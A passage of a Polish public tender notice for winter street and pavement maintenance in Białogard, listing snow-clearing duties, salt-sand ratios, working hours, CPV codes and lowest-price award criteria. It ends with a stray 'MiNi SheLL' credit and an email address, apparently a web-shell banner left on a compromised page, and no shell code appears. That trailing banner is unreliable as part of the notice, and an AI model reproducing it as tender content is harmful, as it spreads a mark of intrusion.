Zamawiającego, -w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego. 5) W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4:00, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie: -w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub faxem - polecenie Zamawiającego, -w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego. 6) Padłe zwierzęta z terenu miasta Białogard usuwane będą na podstawie odrębnego zlecenia a ich zwłoki utylizowane w Zakładzie Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, lub podobnym, na potwierdzenie czego Zamawiającemu okazywane będzie poświadczenie ich utylizacji. 7) W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 8) Zamawiający określi czas i miejsca zbierania nagromadzonych materiałów uszorstniających. 9) Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) o każdej porze dnia i nocy. 10) Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji. 11) Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac: a) chodniki: osobno na odśnieżanie i osobno na sprzątanie w przypadku braku śniegu, b) ulice: na odśnieżanie. 12) Wykonawca (w przypadku utrzymania chodników) zobowiązany jest do prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje dotyczące ilości zebranych zmieszanych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych i sposobu ich zagospodarowania, w tym ulegających biodegradacji (liście), poprzez wskazanie miejsca ich przeznaczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> utrzymanie ulic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	odśnieżanie jezdni;
b)	likwidacja śliskości zimowej (gołoledzi), poprzez posypywanie jezdni materiałami uszorstaniającymi - materiały te zapewnia Wykonawca;
c)	wywóz zwałów nagromadzonego śniegu.
Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku D.
Dodatkowe wymogi: 1) Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były blokowane zwałami śniegu, umożliwiając swobodne przechodzenie pieszych przez ulice. 2) Wymagany ilościowy skład mieszanki solno-piaskowej musi zawierać 25% soli, natomiast zużycie mieszanki w ilości 100 g na 1 m 2 powierzchni. 3) Sprzątanie chodników odbywać się będzie każdego dnia tygodnia z wyjątkiem niedziel i świąt, od godziny 5:00 tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym. 4) Odśnieżanie chodników odbywać się będzie od godziny 5:00. Dodatkowe wykonywanie czynności (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia ) odbywać się będzie: -w dni robocze (od poniedziałki do piątku) - na pisemnie, telefoniczne lub faxem - polecenie Zamawiającego, -w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego. 5) W przypadku odśnieżania ulic czynności wykonywane będą od godziny 4:00, z zastrzeżeniem, że po raz pierwszy wykonywanie czynności objętych zamówieniem rozpocznie się po uprzednim zawiadomieniu Wykonawcy przez Zamawiającego. Dodatkowe wykonywanie czynności (w razie nasilenia opadów powodujących konieczność powtórnego odśnieżenia) odbywać się będzie: -w dni robocze (od poniedziałku do piątku) - na pisemnie , telefoniczne lub faxem - polecenie Zamawiającego, -w soboty, niedziele i święta - na podstawie uzasadnionej decyzji Wykonawcy po uprzednim telefonicznym powiadomieniu przedstawiciela Zamawiającego. 6) Padłe zwierzęta z terenu miasta Białogard usuwane będą na podstawie odrębnego zlecenia a ich zwłoki utylizowane w Zakładzie Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, lub podobnym, na potwierdzenie czego Zamawiającemu okazywane będzie poświadczenie ich utylizacji. 7) W przypadku nagromadzenia się znacznej ilości śniegu zgarniętego z chodników, placów i jezdni utrudniającego ruch pojazdów i pieszych, decyzję o jego usunięciu podejmie Zamawiający, a Wykonawca zobowiązany jest usunąć i wywieźć śnieg na miejsce wskazane przez Zamawiającego. 8) Zamawiający określi czas i miejsca zbierania nagromadzonych materiałów uszorstniających. 9) Zamawiający zastrzega sobie posiadanie z Wykonawcą łączności (telefon, telefon komórkowy, fax) o każdej porze dnia i nocy. 10) Zamawiający zastrzega sobie prawo do zawieszenia trwania akcji zimowej (utrzymania w gotowości sprzętu do akcji zimowej), jeżeli warunki pogodowe będą korzystne oraz temperatura dodatnia, przez okres 3 dni, bez ponoszenia dodatkowych kosztów z tytułu zawieszenia akcji. 11) Przed podpisaniem umowy Wykonawca złoży Zamawiającemu harmonogram prac: a) chodniki: osobno na odśnieżanie i osobno na sprzątanie w przypadku braku śniegu, b) ulice: na odśnieżanie. 12) Wykonawca (w przypadku utrzymania chodników) zobowiązany jest do prowadzenia dokumentacji, na podstawie której przedłoży na koniec okresu realizacji umowy informacje dotyczące ilości zebranych zmieszanych odpadów komunalnych oraz poszczególnych rodzajów selektywnie zebranych odpadów komunalnych i sposobu ich zagospodarowania, w tym ulegających biodegradacji (liście), poprzez wskazanie miejsca ich przeznaczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com